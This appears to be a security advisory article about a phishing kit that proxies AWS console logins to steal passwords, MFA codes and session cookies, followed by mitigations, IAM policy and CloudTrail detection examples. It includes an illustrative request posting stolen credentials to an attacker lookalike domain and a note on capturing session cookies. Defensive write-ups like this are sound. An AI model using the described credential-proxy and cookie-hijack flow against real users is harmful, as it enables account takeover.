A sophisticated Adversary-in-the-Middle (AiTM) phishing kit targeting AWS Management Console users has been discovered in active campaigns. The kit intercepts authentication sessions in real time, capturing usernames, passwords, and multi-factor authentication (MFA) codes to hijack AWS accounts even when protected by MFA. Attackers deploy proxy servers that sit between victims and legitimate AWS login pages, stealing session cookies and tokens to gain immediate unauthorized access to cloud resources.
Introduction
Multi-factor authentication has long been considered a cornerstone of account security, but a new wave of phishing attacks is demonstrating that MFA alone is no longer sufficient protection. Security researchers have identified an advanced phishing kit specifically engineered to target Amazon Web Services (AWS) console users through Adversary-in-the-Middle techniques.
Unlike traditional phishing that simply harvests credentials, this kit operates as a transparent proxy between victims and AWS’s legitimate authentication infrastructure. By intercepting the entire authentication flow, attackers capture not just passwords but also valid session tokens that bypass MFA protections entirely. With AWS environments often containing sensitive data, production systems, and critical infrastructure, the implications of this attack vector are severe.
Background & Context
Adversary-in-the-Middle phishing represents an evolution beyond conventional credential harvesting. Traditional phishing pages are static replicas that collect usernames and passwords but fail when MFA is enabled. AiTM attacks overcome this limitation by proxying all traffic through attacker-controlled infrastructure in real time.
The technique gained prominence with kits like Evilginx and Modlishka, which demonstrated how session cookies could be stolen to bypass MFA. Threat actors have since commercialized these methods, creating turnkey phishing kits targeting specific platforms. AWS, as the world’s leading cloud provider, presents an attractive target due to the high-value resources typically accessible through compromised accounts.
Previous AiTM campaigns have targeted Microsoft 365 and Google Workspace users with significant success. The adaptation of these techniques specifically for AWS indicates a strategic shift by threat actors toward cloud infrastructure compromise. AWS console access provides attackers with potential control over compute resources, databases, storage buckets, and identity management systems.
Technical Breakdown
The AWS AiTM phishing kit operates through a sophisticated proxy architecture that intercepts and manipulates HTTP/HTTPS traffic:
Initial Compromise Vector
Attacks typically begin with emails impersonating AWS notifications about security alerts, billing issues, or service disruptions. These messages contain links to attacker-controlled domains designed to closely resemble legitimate AWS URLs through techniques like typosquatting or subdomain manipulation.
Proxy Infrastructure
When victims click malicious links, they’re directed to a reverse proxy server that fetches content from the real AWS login page. The kit uses the following process:
Victim → Attacker Proxy Server → Legitimate AWS Console
The proxy server maintains two separate connections—one with the victim and one with AWS—allowing it to relay traffic bidirectionally while capturing sensitive data.
Session Token Extraction
As users complete the authentication flow, the kit captures critical authentication artifacts:
POST /authenticate HTTP/1.1
Host: attacker-controlled-aws-lookalike.com
Content-Type: application/x-www-form-urlencoded
username=victim@company.com&password=SecurePass123&mfaCode=123456
Most critically, the kit extracts session cookies including aws-signin-token and other authentication tokens. These session identifiers are what AWS uses to verify authenticated sessions after successful login.
Real-Time Session Hijacking
Once the victim completes MFA, the attacker immediately captures the session cookie:
document.cookie // Captured by proxy
// Contains: aws-signin-token=
The attacker can then import this cookie into their own browser, gaining immediate access to the victim’s AWS console without needing credentials or MFA codes.
Evasion Techniques
Advanced implementations obtain valid TLS certificates for the lookalike domains (typically issued by Let’s Encrypt) so the victim’s browser shows a normal padlock, apply geographic filtering to avoid security researcher detection, and use browser fingerprinting to identify high-value targets.
Impact & Risk Assessment
The consequences of successful AiTM attacks against AWS accounts are potentially catastrophic:
Immediate Risks
- Data Exfiltration: Attackers gain access to S3 buckets, RDS databases, and other storage containing sensitive information
- Resource Hijacking: Compromised accounts can be used to launch compute instances for cryptocurrency mining or botnet operations
- Lateral Movement: AWS credentials often provide pathways to connected services and on-premises infrastructure
- Service Disruption: Attackers may delete resources, modify configurations, or shut down critical services
Financial Impact
Organizations face potential costs from unauthorized resource consumption, data breach notifications, regulatory fines for data exposure, incident response expenses, and business disruption during recovery.
Compliance Implications
Compromised AWS environments containing regulated data (PII, PHI, payment card data) trigger mandatory breach notification requirements under GDPR, HIPAA, PCI-DSS, and other frameworks.
Scope of Exposure
Any organization using AWS with users who access the console through web browsers is potentially vulnerable. The attack is platform-agnostic and works regardless of the victim’s operating system or browser.
Vendor Response
AWS has published security advisories recommending enhanced authentication measures and alerting customers to the phishing campaign. The company’s official stance emphasizes that these attacks exploit user behavior rather than platform vulnerabilities.
AWS has implemented several platform-level protections:
- Enhanced detection for suspicious geographic access patterns
- Machine learning models identifying anomalous console behavior
- Expanded CloudTrail logging to capture authentication anomalies
- Additional warnings for users accessing console from new locations
However, AWS’s primary recommendation remains that customers implement additional security controls beyond basic MFA, particularly hardware-based authentication and conditional access policies.
Mitigations & Workarounds
Organizations can implement multiple defensive layers to protect against AiTM attacks:
Enforce Hardware Security Keys
Require FIDO2/WebAuthn hardware tokens for console access:
# Enroll an MFA device from the CLI. Note that create-virtual-mfa-device
# provisions a software TOTP authenticator, which is NOT phishing-resistant:
# a TOTP code is relayed by the proxy like any other form field. FIDO2
# security keys are registered through the IAM console rather than the CLI.
aws iam create-virtual-mfa-device \
  --virtual-mfa-device-name HardwareTokenRequired \
  --bootstrap-method QRCodePNG \
  --outfile QRCode.png
Hardware security keys resist AiTM attacks because the WebAuthn assertion is bound to the origin the browser is actually talking to: a signature produced for the lookalike domain is not valid for the real AWS sign-in domain, so the proxy captures nothing it can replay.
Implement Conditional Access
Restrict console access based on geographic location, IP ranges, and device compliance:
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "NotIpAddress": {
        "aws:SourceIp": ["203.0.113.0/24"]
      },
      "Bool": {
        "aws:ViaAWSService": "false"
      }
    }
  }]
}
Two details matter here: aws:SourceIp is an IP condition key, so it must be evaluated with IpAddress/NotIpAddress (a StringNotEquals comparison against a CIDR never matches, and the policy would deny everything, including the administrator who applied it); and the aws:ViaAWSService condition keeps the Deny from blocking calls that AWS services make on your behalf from their own addresses.
Deploy Security Awareness Training
Regular phishing simulations help users identify suspicious AWS-themed emails and recognize URL anomalies before entering credentials.
Use AWS IAM Identity Center (SSO)
Centralizing authentication through SSO with federated identity providers adds verification layers and provides better visibility into authentication attempts.
Detection & Monitoring
Early detection of AiTM attacks requires monitoring multiple indicators:
CloudTrail Analysis
Monitor for authentication anomalies:
# List recent console login events; review sourceIPAddress, userAgent and
# additionalEventData.MFAUsed in the returned CloudTrailEvent JSON
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --max-results 50
Look for patterns like rapid geographic impossibility (logins from distant locations within short timeframes) or unusual user agent strings.
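The two patterns just described, applied to CloudTrail ConsoleLogin records, as an added example that is not part of the original article. It assumes a hypothetical IP-to-coordinates table (GEO) in place of a real GeoIP database, and the sample events are constructed.

```python
import math
from datetime import datetime

# Constructed sample CloudTrail ConsoleLogin records (not real telemetry): the
# same user signs in from Frankfurt and, 20 minutes later, from Lagos.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T08:00:00Z", "eventName": "ConsoleLogin",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "203.0.113.10",
     "userAgent": "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0",
     "responseElements": {"ConsoleLogin": "Success"}},
    {"eventTime": "2024-05-01T08:20:00Z", "eventName": "ConsoleLogin",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "198.51.100.77",
     "userAgent": "python-requests/2.31",
     "responseElements": {"ConsoleLogin": "Success"}},
]

# Hypothetical IP -> (lat, lon) table standing in for a GeoIP database.
GEO = {"203.0.113.10": (50.11, 8.68), "198.51.100.77": (6.45, 3.39)}


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points in degrees."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def find_anomalies(events, geo=GEO, max_kmh=900.0):
    """Compare each successful ConsoleLogin with the previous one by the same
    user; report travel faster than max_kmh and User-Agent changes."""
    last = {}  # userName -> (time, source IP, user agent)
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if (ev.get("eventName") != "ConsoleLogin"
                or ev.get("responseElements", {}).get("ConsoleLogin") != "Success"):
            continue
        user = ev["userIdentity"].get("userName", "unknown")
        t = datetime.fromisoformat(ev["eventTime"].replace("Z", "+00:00"))
        ip, ua = ev["sourceIPAddress"], ev.get("userAgent", "")
        if user in last:
            t0, ip0, ua0 = last[user]
            hours = (t - t0).total_seconds() / 3600
            if ip != ip0 and ip in geo and ip0 in geo:
                km = haversine_km(geo[ip0], geo[ip])
                if km > hours * max_kmh:  # also catches hours == 0
                    findings.append(("impossible_travel", user, round(km), ip0, ip))
            if ua != ua0:
                findings.append(("user_agent_change", user, ua0, ua))
        last[user] = (t, ip, ua)
    return findings
```

Feed it the CloudTrailEvent JSON documents returned by lookup-events (or records from the S3 trail) to run it against real data.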
Session Duration Monitoring
AiTM attacks often produce concurrent sessions or unusually long session durations as attackers maintain access.
Failed MFA Attempts
Spikes in failed MFA attempts may indicate attackers testing stolen credentials before launching AiTM proxy attacks.
AWS GuardDuty Alerts
Enable GuardDuty to detect:
- Unusual API call patterns
- Anonymous IP usage
- Impossible travel events
- Credential exfiltration attempts
Best Practices
Organizations should implement comprehensive security measures:
Authentication Hardening
- Mandate hardware security keys for all administrative accounts
- Implement phishing-resistant MFA methods
- Enforce session timeout policies
- Require re-authentication for sensitive operations
Access Management
- Apply principle of least privilege across IAM policies
- Use temporary credentials via AWS STS when possible
- Regularly audit IAM permissions and remove unused access
- Implement break-glass procedures for emergency access
Network Security
- Deploy DNS filtering to block known phishing domains
- Implement TLS inspection where appropriate
- Use VPN or AWS VPC access restrictions for console access
Visibility Enhancement
- Enable CloudTrail across all regions and accounts
- Configure real-time alerting for authentication anomalies
- Implement SIEM integration for centralized monitoring
- Conduct regular access reviews
Key Takeaways
- MFA alone is insufficient protection against modern AiTM phishing attacks that steal session tokens
- AWS console access requires phishing-resistant authentication methods like hardware security keys
- Real-time monitoring of CloudTrail logs is essential for detecting authentication anomalies
- Organizations must implement defense-in-depth strategies combining technical controls and user awareness
- Hardware-based FIDO2 tokens remain the most effective protection against credential interception attacks
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.